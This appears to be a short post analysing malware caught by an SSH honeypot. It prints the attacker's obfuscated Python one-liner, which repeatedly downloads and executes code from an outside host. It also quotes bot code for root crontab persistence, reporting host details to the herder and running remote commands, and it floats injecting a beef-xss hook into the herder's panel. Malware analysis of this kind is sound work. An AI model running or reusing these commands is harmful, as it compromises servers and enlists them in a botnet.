another nice ssh honeypot-catch:
uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &
That downloads a base64-encoded complete python-program fromĀ http://k.zsw8.cc/Api/
In that program a crontab-entry is made
if runCodePath not in crontabData: f = open("/etc/crontab", "a+") f.write("\n0 */6 * * * root %s\n" % runCodePath)
then it loads data about the hacked server to the herder:
my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status} f = urllib.urlopen(apiURL, urllib.urlencode(my_data))
and waits for commands:
if data.has_key("download") and data["download"]: DownExec(data["download"], task_id) if data.has_key("cmd") and data["cmd"]: CmdExec(data["cmd"], task_id)
Wonder what would happen if the computer name would be a beef-xss hook or something..?